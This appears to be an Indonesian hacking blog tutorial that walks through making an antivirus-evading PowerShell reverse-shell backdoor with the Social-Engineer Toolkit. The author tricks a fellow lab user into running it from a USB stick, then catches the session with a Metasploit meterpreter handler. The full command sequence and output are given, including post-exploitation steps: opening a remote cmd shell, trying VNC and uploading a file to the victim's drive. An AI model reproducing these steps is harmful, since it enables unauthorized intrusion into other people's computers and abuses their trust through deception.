Hack Windows 7 with S.E.T + Metasploit on BackBox Linux
Oke kali ini saya akan share tutorial cara meremote komputer korban dengan metasploit. Tools ini sudah tersedia di distro pentest linux seperti backbox, backtrack, kali linux, blackbuntu dll. Yang saya gunakan disini adalah BackBox Linux. saya akan mempraktekkan cara meremote komputer target yang berada dalam satu jaringan. Victim menggunakan OS Windows 7 dan Firewall dalam keadaan aktif. Oh iya, doi juga pake antivirus Avast. jadi kalo cuma pake backdoor biasa untuk membuka meterpreter session, dijamin backdoor mu dihajar sama avast sebelum sempet di eksekusi.
Pertama, kita buat backdoor dulu. Disini kita menggunakan Social Engineering Toolkit yang sudah tersedia di BackBox.
root@backbox: # setoolkit .
[*] Checking to see if bleeding-edge repos are active.
[!] Bleeding edge repos were not detected. This is recommended.
Do you want to enable bleeding-edge repos for fast updates [yes/no]: no
[:(] Your loss! Bleeding edge provides updates regularly to Metasploit, SET, and others!
[-] New set_config.py file generated on: 2014-12-02 09:52:26.378618
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2014-12-02 09:52:26.378618
[*] SET is using the new config, no need to restart
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
Pilih nomor satu, Social-Engineering Attacks
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
set> 9
Pilih nomor 9, karena kita akan membuat Powershell Attack Vectors
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>1
pilih Powershell Alphanumeric Shellcode Injector
set> IP address for the payload listener: 10.11.12.29 <= isi dengan ip kita. cek di ifconfig.
set:powershell> Enter the port for the reverse [443]:6969 <= isi port terserah.
[*] Prepping the payload for delivery and injecting alphanumeric shellcode…
[*] Generating x86-based powershell injection code…
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy…
[*] If you want the powershell commands and attack, they are exported to /home/jackwilder/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : no
[*] Powershell files can be found under /home/jackwilder/.set/reports/powershell/
Pembuatan Undetected Backdoor |
Disitu tertulis “Powershell files can be found under /home/jackwilder/.set/reports/powershell/” . Coba buka folder nya, … ketemu.
File nya masih txt.
Rename jadi bentuk bat / cmd . Terserah.
Saatnya Social Engineering on action 😀
Lokasi backdoor yang dibuat dengan SET |
Tugas mu adalah menyebarkan file backdoor yang kamu buat tadi dan korban harus mengeksekusinya.
Berhubung
saya anak lab, gampang aja :v . Tinggal dalih mau copy tugas, bawa
flashdisk mu, tancepin kesana, ya sambil copy tugas beneran gak apa apa,
klik sendiri program nya :v .
Sampai disini bisa dibilang kita sudah melangkah 60% lah 😀
Balik lagi ke BackBox kesayangan mu, buka metasploit.
root@b0x: # msfconsole
=[ metasploit v4.10.1-dev [core:4.10.1.pre.dev api:1.0.0]]
+ — –=[ 1344 exploits – 739 auxiliary – 217 post ]
+ — –=[ 340 payloads – 35 encoders – 8 nops ]
+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.12.29 <= sesuaikan denan ip yang ada di backdoor
LHOST => 10.11.12.29
msf exploit(handler) > set LPORT 6969 <= sesuaikan dengan port yang ada di backdoor
LPORT => 6969
msf exploit(handler) > exploit
Metasploit on Action |
And…..
[*] Started reverse handler on 10.11.12.29:6969
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 10.11.12.179
[*] Meterpreter session 1 opened (10.11.12.29:6969 -> 10.11.12.179:49164) at 2014-12-01 02:07:42 +0700
Meterpreter Session |
Welcome to Meterpreter Session.. honey… :*
meterpreter > sysinfo
Computer : ISIS-PC << anggota ISIS dia wakakakaka :v .
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : id_ID
Meterpreter : x86/win32
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=10.11.12.29 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:UsersisisAppDataLocalTemppggDswu.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 10.11.12.29:4545…
[*] Failed. Maybe used by another program.
Gagal membuka desktopnya 🙁
kemungkinan file pggDswu.exe yang diupload dihajar sama avast.
Kalo pengen ngebuka cmd nya, lakukan perintah berikut
meterpreter > execute -M -f cmd.exe -i
Process 2404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Sebenernya masih banyak yang bisa dilakukan disini. tapi berhubung ane cuma iseng ane upload aja file koleksi ane ke victim .
meterpreter > upload /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4 D:
[*] uploading /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4
[*] uploaded /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4 > D:fucking_time.mp4
meterpreter >
Sekian yang dapat saya berikan.
At least .Hack the Gibson…and remember…hugs are worth more than handshakes. 😉
Sumber http://noob1t4.blogspot.com/
Sekian Artikel Hack Windows 7 with S.E.T + Metasploit on BackBox Linux.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "Hack Windows 7 with S.E.T + Metasploit on BackBox Linux"
Posting Komentar